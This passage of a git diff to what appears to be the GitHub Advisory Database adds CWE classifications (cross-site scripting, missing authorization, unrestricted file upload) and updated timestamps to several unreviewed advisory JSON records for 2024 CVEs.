"2024-07-19T12:31:28Z", "aliases": [ "CVE-2024-5977" diff --git a/advisories/unreviewed/2024/07/GHSA-v545-g82r-gvw3/GHSA-v545-g82r-gvw3.json b/advisories/unreviewed/2024/07/GHSA-v545-g82r-gvw3/GHSA-v545-g82r-gvw3.json index 78a2a756ebf..b51fb9c6335 100644 --- a/advisories/unreviewed/2024/07/GHSA-v545-g82r-gvw3/GHSA-v545-g82r-gvw3.json +++ b/advisories/unreviewed/2024/07/GHSA-v545-g82r-gvw3/GHSA-v545-g82r-gvw3.json @@ -28,7 +28,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/07/GHSA-vm99-c867-38q4/GHSA-vm99-c867-38q4.json b/advisories/unreviewed/2024/07/GHSA-vm99-c867-38q4/GHSA-vm99-c867-38q4.json index 08e6707ff72..121c09fa272 100644 --- a/advisories/unreviewed/2024/07/GHSA-vm99-c867-38q4/GHSA-vm99-c867-38q4.json +++ b/advisories/unreviewed/2024/07/GHSA-vm99-c867-38q4/GHSA-vm99-c867-38q4.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-vm99-c867-38q4", - "modified": "2024-07-17T09:30:48Z", + "modified": "2024-07-19T18:31:20Z", "published": "2024-07-17T09:30:48Z", "aliases": [ "CVE-2024-6033" @@ -36,7 +36,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-862" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/07/GHSA-w8fj-xvmx-vq79/GHSA-w8fj-xvmx-vq79.json b/advisories/unreviewed/2024/07/GHSA-w8fj-xvmx-vq79/GHSA-w8fj-xvmx-vq79.json index 2ca76831aed..2d17b3d1f27 100644 --- a/advisories/unreviewed/2024/07/GHSA-w8fj-xvmx-vq79/GHSA-w8fj-xvmx-vq79.json +++ b/advisories/unreviewed/2024/07/GHSA-w8fj-xvmx-vq79/GHSA-w8fj-xvmx-vq79.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-w8fj-xvmx-vq79", - "modified": "2024-07-18T09:30:51Z", + "modified": "2024-07-19T18:31:21Z", "published": "2024-07-18T09:30:51Z", "aliases": [ "CVE-2024-3242" @@ -44,7 +44,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-434" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/07/GHSA-xgmg-7q7c-fhxx/GHSA-xgmg-7q7c-fhxx.json b/advisories/unreviewed/2024/07/GHSA-xgmg-7q7c-fhxx/GHSA-xgmg-7q7c-fhxx.json index fc8deacbbc3..8dc5c7883db 100644 --- a/advisories/unreviewed/2024/07/GHSA-xgmg-7q7c-fhxx/GHSA-xgmg-7q7c-fhxx.json +++ b/advisories/unreviewed/2024/07/GHSA-xgmg-7q7c-fhxx/GHSA-xgmg-7q7c-fhxx.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-xgmg-7q7c-fhxx", - "modified": "2024-07-17T09:30:49Z", + "modified": "2024-07-19T18:31:20Z", "published": "2024-07-17T09:30:49Z", "aliases": [ "CVE-2024-6669" @@ -44,7 +44,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], "severity": "MODERATE", "github_reviewed": false,